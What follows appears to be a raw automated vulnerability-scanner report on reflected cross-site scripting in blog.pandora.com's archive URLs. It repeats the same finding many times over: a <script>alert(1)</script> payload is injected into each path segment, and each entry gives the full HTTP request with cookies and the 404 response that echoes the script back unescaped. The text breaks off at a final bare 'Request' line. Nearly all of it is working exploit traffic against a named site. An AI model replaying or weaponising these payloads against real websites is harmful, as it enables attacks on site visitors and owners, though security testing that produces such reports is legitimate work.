HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:23 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Content-Length: 349 Connection: close Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2007/02b33a6<script>alert(1)</script>2c3a3b69a5c/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ac326<script>alert(1)</script>370b7b6a4ed was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandoraac326<script>alert(1)</script>370b7b6a4ed/archives/2007/03/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:07 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandoraac326<script>alert(1)</script>370b7b6a4ed/archives/2007/03/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 90b22<script>alert(1)</script>4fb98f6e6f6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives90b22<script>alert(1)</script>4fb98f6e6f6/2007/03/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:09 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives90b22<script>alert(1)</script>4fb98f6e6f6/2007/03/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 413a3<script>alert(1)</script>9a08076521d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2007413a3<script>alert(1)</script>9a08076521d/03/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:12 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2007413a3<script>alert(1)</script>9a08076521d/03/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload d17eb<script>alert(1)</script>62f82312779 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2007/03d17eb<script>alert(1)</script>62f82312779/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:15 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2007/03d17eb<script>alert(1)</script>62f82312779/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2c059<script>alert(1)</script>cbdd421d4ad was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora2c059<script>alert(1)</script>cbdd421d4ad/archives/2007/04/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:17 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Content-Length: 349 Connection: close Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora2c059<script>alert(1)</script>cbdd421d4ad/archives/2007/04/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload b3228<script>alert(1)</script>c5395df2fbd was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archivesb3228<script>alert(1)</script>c5395df2fbd/2007/04/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:20 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archivesb3228<script>alert(1)</script>c5395df2fbd/2007/04/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload a573a<script>alert(1)</script>1397d442dff was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2007a573a<script>alert(1)</script>1397d442dff/04/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:22 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2007a573a<script>alert(1)</script>1397d442dff/04/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 86757<script>alert(1)</script>a841a197765 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2007/0486757<script>alert(1)</script>a841a197765/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:26 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2007/0486757<script>alert(1)</script>a841a197765/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d0cd0<script>alert(1)</script>6fc6995917b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandorad0cd0<script>alert(1)</script>6fc6995917b/archives/2007/05/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:08 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Content-Length: 349 Connection: close Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandorad0cd0<script>alert(1)</script>6fc6995917b/archives/2007/05/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 590d0<script>alert(1)</script>cfaacaaf3db was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives590d0<script>alert(1)</script>cfaacaaf3db/2007/05/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:11 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives590d0<script>alert(1)</script>cfaacaaf3db/2007/05/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 5b6bf<script>alert(1)</script>7c9340a2e6a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/20075b6bf<script>alert(1)</script>7c9340a2e6a/05/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:15 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/20075b6bf<script>alert(1)</script>7c9340a2e6a/05/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload b5da7<script>alert(1)</script>d624e770f2a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2007/05b5da7<script>alert(1)</script>d624e770f2a/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:21 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2007/05b5da7<script>alert(1)</script>d624e770f2a/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 8d9ba<script>alert(1)</script>060e4b9ef4e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora8d9ba<script>alert(1)</script>060e4b9ef4e/archives/2007/06/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:05 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora8d9ba<script>alert(1)</script>060e4b9ef4e/archives/2007/06/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c0798<script>alert(1)</script>ad8c655c453 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archivesc0798<script>alert(1)</script>ad8c655c453/2007/06/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:08 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archivesc0798<script>alert(1)</script>ad8c655c453/2007/06/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload f490a<script>alert(1)</script>57eed6c6746 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2007f490a<script>alert(1)</script>57eed6c6746/06/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:10 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2007f490a<script>alert(1)</script>57eed6c6746/06/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 82d62<script>alert(1)</script>a51d01b1831 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2007/0682d62<script>alert(1)</script>a51d01b1831/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:13 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2007/0682d62<script>alert(1)</script>a51d01b1831/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 6e10b<script>alert(1)</script>bac3aa178c9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora6e10b<script>alert(1)</script>bac3aa178c9/archives/2007/07/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:11 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora6e10b<script>alert(1)</script>bac3aa178c9/archives/2007/07/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload ab862<script>alert(1)</script>9916758d92c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archivesab862<script>alert(1)</script>9916758d92c/2007/07/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:13 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archivesab862<script>alert(1)</script>9916758d92c/2007/07/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 6c196<script>alert(1)</script>20072b4f4e1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/20076c196<script>alert(1)</script>20072b4f4e1/07/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:15 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/20076c196<script>alert(1)</script>20072b4f4e1/07/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 8c182<script>alert(1)</script>7e15c131859 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
